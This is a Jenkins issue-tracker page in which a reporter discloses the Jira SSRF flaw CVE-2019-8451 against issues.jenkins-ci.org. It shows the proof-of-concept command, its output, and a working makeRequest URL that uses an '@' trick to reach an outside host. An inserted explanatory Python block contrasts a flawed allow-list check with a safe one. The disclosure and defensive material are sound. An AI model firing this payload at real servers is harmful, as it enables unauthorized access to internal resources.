
SSRF on https://issues.jenkins-ci.org/

      Description

      Hi Security Team,

      Summary

      The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.

      CVE-2019-8451 is a pre-authentication server side request forgery (SSRF) vulnerability found in the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal network resources.

      The vulnerability was first introduced in Jira Core and Jira Software versions 7.6.0, an enterprise release in November 2017, and affects Jira Core and Software versions from 7.6.0 through 8.3.4.

      Steps To Reproduce:

      1. Target is https://issues.jenkins-ci.org/, which uses Atlassian Jira Project Management Software (v7.13.6)
      2. Let's rock!

      wayc0de@DESKTOP-9C0TVKV:~/tools/CVE-2019-8451$ python CVE-2019-8451.py https://issues.jenkins-ci.org

      Result:

      >>>>SSRF URL: www.baidu.com

      >>>>Send poc Success!

      X-AUSERNAME= anonymous

      >>>>vuln_url= https://issues.jenkins-ci.org/plugins/servlet/gadgets/makeRequest?url=https://issues.jenkins-ci.org@www.baidu.com


      As you can see in the response: <title>百度一下,你就知道</title>

      Reference
      1. https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
      2. https://jira.atlassian.com/browse/JRASERVER-69793

      Impact:

      An SSRF can provide attackers with the ability to query the cloud provider's APIs, enumerating permissions and extracting data or executing API commands for other cloud services. Our example above simply aims to get the security credentials from the environment.
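      The vuln_url in the report puts the allowed host in the URL's userinfo part (`https://issues.jenkins-ci.org@www.baidu.com`), so a check that looks at the raw string sees the trusted name while the request actually goes to www.baidu.com. The following is an added example, not Jira's JiraWhitelist code and not the reporter's script, that shows this failure mode next to a check deciding on the parsed hostname; the allow-list contents and the function names are assumptions made for the example.

```python
"""Added example (not Jira's code): a hostname allow-list must be checked
against the parsed host, never against the raw URL string.

The URL from the report, https://issues.jenkins-ci.org@www.baidu.com, carries
the allowed name as userinfo; a prefix check accepts it, but a client connects
to www.baidu.com.
"""
from urllib.parse import urlsplit

# Hypothetical allow-list for this example: only the tracker's own host.
ALLOWED_HOSTS = {"issues.jenkins-ci.org"}


def naive_allowed(url: str) -> bool:
    """String-prefix check in the style that the '@' trick defeats."""
    return any(url.startswith(f"https://{h}") for h in ALLOWED_HOSTS)


def parsed_allowed(url: str) -> bool:
    """Decide on the parsed hostname after scheme and userinfo are split off."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    if parts.username is not None or parts.password is not None:
        # Credentials embedded in the URL are the bypass vector: reject outright.
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    return host in ALLOWED_HOSTS


def effective_host(url: str) -> str:
    """The host an HTTP client would actually connect to for this URL."""
    return (urlsplit(url).hostname or "").lower()


if __name__ == "__main__":
    for url in ("https://issues.jenkins-ci.org/browse/JENKINS-59916",
                "https://issues.jenkins-ci.org@www.baidu.com"):
        print(f"{url}\n  naive={naive_allowed(url)} parsed={parsed_allowed(url)} "
              f"connects_to={effective_host(url)}")
```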


          Activity

          warden Radek Antoniuk added a comment -

          This is caused by a security vulnerability in Atlassian JIRA, not the Jenkins Jira plugin, which is only a consumer of the Jira API, correct?
          This issue tracker is for issues in Jenkins and/or Jenkins plugins only.

          aiguom Marton Bin added a comment -

          Where is the feedback of such questions?


            People

            • Assignee: Unassigned
            • Reporter: wayc0de Wayc0de
            • Votes: 1
            • Watchers: 3
